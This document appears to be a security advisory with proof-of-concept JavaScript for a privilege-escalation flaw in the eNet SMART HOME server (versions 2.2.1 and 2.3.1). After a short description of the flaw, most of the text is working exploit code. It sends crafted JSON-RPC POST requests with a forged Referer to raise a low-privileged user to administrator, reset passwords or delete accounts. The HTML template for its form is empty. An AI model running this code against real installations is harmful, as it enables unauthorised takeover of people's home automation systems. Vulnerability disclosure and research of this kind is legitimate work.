/*
eNet SMART HOME server 2.3.1 (setUserGroup) Remote Privilege Escalation
Vendor: Gira Giersiepen GmbH & Co. KG | ALBRECHT JUNG GmbH & Co. KG | Insta GmbH
Product web page: https://www.enet-smarthome.com
Affected version: 2.3.1 (46841)
2.2.1 (46056)
Summary: Two German specialists in building systems technology are jointly bringing
a new, wireless-based smart home system to the market. Gira and JUNG are the companies
behind the eNet SMART HOME brand with our subsidiary, INSTA, responsible for developing
the system. All three of us are old hands when it comes to building automation, and
have a history of connecting buildings in an intelligent way that goes back as far as
the 80s. Gira, JUNG and INSTA were part of the group of companies that initiated and
founded EIBA (now known as KNX). KNX is the first open global standard for home and
building automation. Through KNX, we have decisively shaped the development of intelligent
building systems technology – and this wealth of experience has now come together in
eNet SMART HOME. The eNet server is the heart of every eNet SMART HOME system and
offers end customers the basis for an easy-to-use and secure Smart Home and installation
engineers easily understandable and professional commissioning of the system.
Desc: The eNet Smart Home system suffers from a privilege escalation vulnerability due
to insufficient authorization checks in the JSON-RPC endpoint for user management. A
low-privileged user, can exploit the "setUserGroup" method by sending a crafted POST
request to /jsonrpc/management, specifying their own username and elevating it to the
"UG_ADMIN" group. This bypasses intended access controls, granting the attacker administrative
capabilities such as modifying device configurations, network settings, and potentially
compromising the entire smart home ecosystem.
Tested on: GNU/Linux 4.4.15 (ARMv7 revision 5)
Jetty(9.2.z-SNAPSHOT)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5975
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5975.php
07.02.2026
*/
const existingContainer = document.getElementById('exploitSnippet');
if (existingContainer) existingContainer.remove();
const currentProtocol = window.location.protocol.slice(0, -1);
const currentHost = window.location.hostname;
const currentPort = window.location.port || (currentProtocol === 'https' ? '443' : '80');
const urlParams = new URLSearchParams(window.location.search);
let defaultIcp = urlParams.get('icp') || '';
const formHtml = `
`;
document.body.insertAdjacentHTML('beforeend', formHtml);
const actionSelect = document.getElementById('action');
const runButton = document.getElementById('runButton');
const closeButton = document.getElementById('closeButton');
const responseOutput = document.getElementById('responseOutput');
const elevateFields = document.getElementById('elevateFields');
const resetFields = document.getElementById('resetFields');
const deleteFields = document.getElementById('deleteFields');
const requestIdInput = document.getElementById('requestId');
const updateFields = (value) => {
elevateFields.style.display = value === 'elevate' ? 'block' : 'none';
resetFields.style.display = value === 'reset' ? 'block' : 'none';
deleteFields.style.display = value === 'delete' ? 'block' : 'none';
let defaultId = '14';
if (value === 'reset') defaultId = '15';
if (value === 'delete') defaultId = '6';
requestIdInput.value = defaultId;
};
actionSelect.addEventListener('change', (e) => updateFields(e.target.value));
updateFields(actionSelect.value);
runButton.addEventListener('click', () => {
const protocol = document.getElementById('protocol').value;
const host = document.getElementById('host').value;
const port = document.getElementById('port').value;
const icp = document.getElementById('icp').value;
const action = actionSelect.value;
const requestId = requestIdInput.value;
if (!icp) {
responseOutput.textContent = 'Error: ICP is required.';
console.error('ICP is required.');
return;
}
responseOutput.textContent = 'Loading...';
let method, params;
if (action === 'elevate') {
method = 'setUserGroup';
params = {
userName: document.getElementById('userName').value,
userGroup: document.getElementById('userGroup').value
};
} else if (action === 'reset') {
method = 'resetUserPassword';
params = {
userName: document.getElementById('resetUserName').value,
defaultPassword: document.getElementById('defaultPassword').value
};
} else if (action === 'delete') {
method = 'deleteUserAccount';
params = {
userName: document.getElementById('deleteUserName').value
};
}
const baseUrl = `${protocol}://${host}:${port}`;
const customReferer = `${baseUrl}/serverconfiguration.html?icp=${icp}#Usermanagement`;
const fetchUrl = `${baseUrl}/jsonrpc/management`;
const body = JSON.stringify({
"jsonrpc": "2.0",
"method": method,
"params": params,
"id": requestId
});
console.log('Sending request to:', fetchUrl);
console.log('With Referer:', customReferer);
console.log('Body:', body);
const timeoutPromise = new Promise((_, reject) =>
setTimeout(() => reject(new Error('Request timed out')), 10000)
);
Promise.race([timeoutPromise, fetch(fetchUrl, {
method: 'POST',
headers: {
'Content-Type': 'application/json; charset=utf-8',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'ku-MK,ku;j=1.7',
'Accept': '*/*'
},
body: body,
credentials: 'include',
referrer: customReferer,
referrerPolicy: 'unsafe-url'
})])
.then(response => {
if (response instanceof Error) throw response;
console.log('Response status:', response.status);
if (!response.ok) {
throw new Error(`HTTP error! Status: ${response.status}`);
}
return response.json();
})
.then(data => {
const successMsg = `Success: ${JSON.stringify(data, null, 2)}`;
responseOutput.textContent = successMsg;
console.log(successMsg);
setTimeout(() => location.reload(), 2000);
})
.catch(error => {
const errorMsg = `Error: ${error.message}`;
responseOutput.textContent = errorMsg;
console.error(errorMsg);
});
});
closeButton.addEventListener('click', () => {
console.log('Closing form...');
const container = document.getElementById('exploitSnippet');
if (container) {
container.remove();
console.log('Form closed.');
} else {
console.log('Form not found.');
}
});